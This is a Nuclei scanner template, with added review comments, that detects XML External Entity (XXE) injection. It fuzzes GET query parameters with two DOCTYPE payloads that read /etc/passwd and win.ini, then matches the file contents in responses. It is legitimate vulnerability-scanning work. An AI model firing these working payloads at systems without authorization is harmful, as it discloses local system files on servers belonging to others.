nuclei-templates/dast/vulnerabilities/xxe/generic-xxe.yaml
# Nuclei DAST template: detects XML External Entity (XXE) injection by
# substituting a DOCTYPE that declares an external entity into XML-bearing
# query parameters and checking whether local-file content surfaces in the
# response body.
id: generic-xxe

info:
  name: Generic XML external entity (XXE)
  author: pwnhxl
  severity: medium
  reference:
    - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
  metadata:
    # presumably the request budget per fuzzed parameter (two payloads) — confirm
    max-request: 2
  tags: dast,xxe

variables:
  # Six-character name drawn from the alphabet 'abc', used both as the DOCTYPE
  # name and the entity name below; presumably randomized so the payload has
  # no fixed string for signature-based filters to key on — confirm.
  rletter: "{{rand_base(6,'abc')}}"

http:
  # Only GET requests are fuzzed; both fuzzing rules below target the query.
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    # One payload per target platform. Each declares an external entity that
    # resolves to a well-known local file and references it in the document
    # body, so a vulnerable parser inlines the file content into the response.
    # NOTE(review): the Unix URI carries four slashes (file:////etc/passwd)
    # while the Windows one carries three — confirm this difference is
    # intentional rather than a typo.
    payloads:
      xxe:
        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'

    fuzzing:
      # Rule 1: any query parameter whose name contains "xml" gets the payload.
      - part: query
        keys-regex:
          - "(.*?)xml(.*?)"
        fuzz:
          - "{{xxe}}"
      # Rule 2: any query value that already holds an XML prolog or DOCTYPE,
      # raw or URL-encoded, is replaced with the payload.
      - part: query
        values:
          - "(<!DOCTYPE|<?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>"
        fuzz:
          - "{{xxe}}"

    # Stop fuzzing a target once one payload produces a match.
    stop-at-first-match: true
    # Either matcher on its own is treated as evidence of file disclosure.
    # NOTE(review): both matchers look only at the response body; a page that
    # already contains a passwd-style line or win.ini text would match without
    # any injection — consider confirming against an unfuzzed baseline.
    matchers-condition: or
    matchers:
      # Linux: a passwd-style record ("root:x:0:0:") in the body.
      - type: regex
        name: linux
        part: body
        regex:
          - 'root:.*?:[0-9]*:[0-9]*:'

      # Windows: a fixed string found in the default win.ini.
      - type: word
        name: windows
        part: body
        words:
          - 'for 16-bit app support'
# NOTE(review): the signed "# digest:" line at the end of this file is
# presumably computed over the template text, so any edit (including added
# comments) requires re-signing before nuclei treats the template as trusted.
# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950